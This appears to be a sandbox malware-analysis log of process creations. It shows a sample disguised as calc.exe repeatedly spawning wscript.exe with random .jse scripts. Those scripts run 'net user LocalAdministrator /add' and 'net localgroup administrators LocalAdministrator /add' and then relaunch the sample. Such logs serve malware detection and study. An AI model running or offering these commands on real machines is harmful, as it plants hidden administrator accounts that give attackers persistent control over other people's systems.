Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" Jtk8zxQOt2.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" PZr1luuECN.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" 5BgbSwcYMy.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net1.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" 38gtKBXT3l.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" oiAgAiPmEb.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" 0ivQggl30s.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" rYJ0AO4T7K.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" osIg59v0bz.jse | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" BKnQ77VBHl.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" gszpj8rp81.jse | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: unknown | Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /s | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" Kiql0emrm5.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" KobIITTimt.jse | |
Source: unknown | Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /s | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" N0NpXvrAfH.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" VAJOf7ymJQ.jse | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" mumMT6WOaG.jse | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | Jump to behavior |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | Jump to behavior |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" fhZL0KwyiV.jse | Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" IDsLsRQlEe.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" cNs6XgJUw5.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" rbLiDVEIXX.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" UqWLwYRtxi.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" iy4J2BVXGi.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" G0MZ6GMwly.jse | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" nPYwCIjDlS.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" fevGSHOMU4.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" jkdKCpQjxW.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" iTc0FWDklf.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" Ssbk19MNG3.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" R7pPYI1mUq.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" xJLmgXOpyA.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" nmkcc07AEX.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
